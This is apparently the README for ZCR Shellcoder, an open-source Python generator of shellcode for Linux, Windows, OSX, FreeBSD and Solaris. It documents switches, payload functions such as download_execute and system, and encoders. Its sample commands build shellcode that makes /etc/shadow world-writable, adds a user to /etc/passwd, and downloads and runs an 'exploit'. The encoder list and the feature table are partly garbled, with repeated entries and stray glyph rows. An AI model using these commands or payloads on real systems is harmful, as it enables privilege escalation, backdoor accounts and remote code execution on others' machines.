ZCR Shellcoder

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<u>ZeroDay Cyber Research Shellcoder [Generator]</u> is an open source software in python language which lets you generate customized shellcodes for listed operation systems. This software can be run on Windows/Linux&Unix/OSX and others OS under python 2.7.x.

How it work?

For show list of switches you need to run software with "-h" or "--h" or "--help" or "--help" commands.

```
ZeroDay Cyber Research Shellcoder

Switches:
-h, --h, -help, --help => to see this help guide
-os => choose your os to create shellcode
-oslist => list os for switch -os
-o => output filename
-job => what shellcode gonna do for you?
-joblist => list of -job switch
-encode => generate shellcode with encode
-types => types of encode for -encode switch
-update => check for update

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```

 -os switch lets you choose your target operation system. you can see os list supported with -oslist switch.

```
[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x64

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- -o switch is output filename which will be generate in output folder.
- -job switch used for choose your fucntion to generate shellcode. you can see functions list with -joblist switch.

```
[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of your script in your pc','execute command')

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-encode switch uses to choose your shellcode encode type, for see the list of encode types, execute -types switch.

```
[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] add_yourvalue
[+] sub_random
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc
[+] inc
[+] inc
[+] inc
[+] inc
[+] dec
[+] dec
[+] dec
[+] dec_timesyouwant
[+] mix_all

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-update switch uses to begin update the software. You also can see archive of versions in this url:

https://github.com/Ali-Razmjoo/ZCR-Shellcoder-Archive

and the last update available at: https://github.com/Ali-Razmjoo/ZCR-Shellcoder

and: http://www.z3r0d4y.com/p/zcr-shellcoder.html

Available Features:

OS_LIST /	Linux	Linux	Linux	Linux	FreeBSD	FreeBSD	Windows	Windows	OSX	Solaris	Solaris
Functions	x86	x64	Arm	Mips	X64	x86	x64	x86		x64	x86
exec	1	0	0	0	0	0	0	0	0	0	0
chmod	1	0	0	0	0	0	0	0	0	0	0
write	1	0	0	0	0	0	0	0	0	0	0
file_create	0	0	0	0	0	0	0	0	0	0	0
dir_create	0	0	0	0	0	0	0	0	0	0	0
download	0	0	0	0	0	0	0	0	0	0	0
download_execute	0	0	0	0	0	0	0	0	0	0	0
system	1	0	0	0	0	0	0	0	0	0	0
script_executor	0	0	0	0	0	0	0	0	0	0	0
11111111111111	III		Ш	Ш	Ш	Ш	Ш	Ш	III	III	Ш
Encodes	Ш	III	Ш	III	III	III	Ш	Ш	Ш	HH	Ш
none	1	1	1	1	1	1	1	1	1	1	1
xor_random	0	0	0	0	0	0	0	0	0	0	0
xor_yourvalue	0	0	0	0	0	0	0	0	0	0	0
add_random	0	0	0	0	0	0	0	0	0	0	0
add_yourvalue	0	0	0	0	0	0	0	0	0	0	0
sub_random	0	0	0	0	0	0	0	0	0	0	0
sub_yourvalue	0	0	0	0	0	0	0	0	0	0	0
inc	0	0	0	0	0	0	0	0	0	0	0
inc_timesyouwant	0	0	0	0	0	0	0	0	0	0	0
dec	0	0	0	0	0	0	0	0	0	0	0
dec_timesyouwant	0	0	0	0	0	0	0	0	0	0	0
mix_all	0	0	0	0	0	0	0	0	0	0	0

Sample of executable commands:

Windows cmd:

python shellcoder.py -os linux_x86 -job chmod('/etc/shadow','777') -encode none -o shellcode.asm

python shellcoder.py -os linux_x86 -job write('/etc/passwd','Ali......[add user]') -encode none -o shellcode.asm

python shellcoder.py -os linux_x86 -job exec('/usr/bin/python') -encode none -o shellcode.asm

system()

python shellcoder.py -os linux_x86 -job system('chmod[space]777[space]/etc/shadow') - encode none -o shellcode.asm

multi command execution

python shellcoder.py -os linux_x86 -job
system('chmod[space]777[space]/etc/shadow;wget[space]exploit[space];chmod[space]+x[s
pace]exploit[space];./exploit;echo[space]user:pass[space]>>[space]/etc/passwd') -encode
none -o shellcode.asm

Linux and OSX Terminal:

you need to put a "\" behind the "(" and "'" char in your switch.

python shellcoder.py -os linux_x86 -job chmod\(\'/etc/shadow\', \'777\'\) -encode none -o shellcode.asm

python shellcoder.py -os linux_x86 -job write\(\'/etc/passwd\', \'Ali.......[add user] \'\) - encode none -o shellcode.asm

python shellcoder.py -os linux_x86 -job exec\(\'/usr/bin/python\'\) -encode none -o shellcode.asm

system()

python shellcoder.py -os linux_x86 -job
system\(\'chmod[space]777[space]/etc/shadow\'\) -encode none -o shellcode.asm

multi command execution

python shellcoder.py -os linux_x86 -job
system\(\'chmod[space]777[space]/etc/shadow;wget[space]exploit[space];chmod[space]+
x[space]exploit[space];./exploit;echo[space]user:pass[space]>>[space]/etc/passwd\'\) encode none -o shellcode.asm

For more information and software analysis with more guides visit z3r0d4y.com.

References:

ZeroDay Cyber Research z3r0d4y.com

Home : http://www.z3r0d4y.com/p/zcr-shellcoder.html

Analysis post: http://www.z3r0d4y.com/2015/05/zcr-shellcoder-review-and-

analysis_20.html

Github: https://github.com/Ali-Razmjoo/ZCR-Shellcoder

Archive: https://github.com/Ali-Razmjoo/ZCR-Shellcoder-Archive